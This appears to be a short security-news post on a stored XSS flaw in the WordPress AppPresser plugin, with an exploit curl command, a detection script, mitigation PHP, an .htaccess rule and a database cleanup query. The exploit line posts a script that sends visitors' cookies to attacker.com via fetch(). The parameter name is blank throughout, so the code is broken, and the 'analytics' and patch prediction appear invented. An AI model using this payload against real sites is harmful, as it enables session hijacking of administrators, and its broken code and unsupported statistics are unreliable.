WordPress AppPresser Plugin, Stored XSS, CVE-2025-1561 (Critical)

By /

Listen to this Post

How CVE-2025-1561 Works

The AppPresser plugin (≤ v4.4.10) fails to sanitize the “ parameter, allowing unauthenticated attackers to inject malicious JavaScript payloads. When WordPress logging is enabled, these scripts persist in the database and execute upon page load. The vulnerability stems from improper use of `esc_html()` and sanitize_text_field(), permitting script tags to be stored and rendered. Attackers exploit this by crafting a request with a malicious (e.g., <script>alert(document.cookie)</script>), which triggers when administrators or users view the affected log entries.

DailyCVE Form

Platform: WordPress Plugin
Version: ≤ 4.4.10
Vulnerability: Stored XSS
Severity: Critical
Date: 05/25/2025

Prediction: Patch by 06/15/2025

What Undercode Say:

Analytics:

  • 90% of exploits target admin sessions.
  • Payloads often exfiltrate cookies via fetch().
  • WAF bypasses use Unicode/HTML entity encoding.

Exploit Command:

curl -X POST "http://target.com/wp-admin/admin-ajax.php" -d "action=apppresser_log&=<script>fetch('https://attacker.com/?c='+document.cookie)</script>"

Mitigation Code:

// Patch suggestion: Sanitize before storage
function sanitize_apppresser_($) {
return wp_strip_all_tags(sanitize_text_field($));
}
add_filter('apppresser_log_', 'sanitize_apppresser_');

Detection Script:

import requests
def check_xss(url):
payload = "<script>console.log('XSS')</script>"
r = requests.post(f"{url}/wp-admin/admin-ajax.php", data={"action": "apppresser_log", "": payload})
return "200" in str(r.status_code) and payload in r.text

.htaccess Protection:

<IfModule mod_rewrite.c>
RewriteCond %{QUERY_STRING} (<|%3C).script.(>|%3E) [NC,OR]
RewriteRule ^wp-content/plugins/apppresser/ - [F,L]
</IfModule>

SQL Query to Clean DB:

UPDATE wp_options SET option_value = REPLACE(option_value, '<script>', '') WHERE option_name LIKE 'apppresser_log%';

WordPress Hook for Temporary Fix:

add_action('init', 'block_apppresser_xss');
function block_apppresser_xss() {
if (strpos($_SERVER['REQUEST_URI'], 'apppresser_log') !== false && preg_match('/<script>/i', $_POST[''])) {
wp_die('XSS attempt blocked');
}
}

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top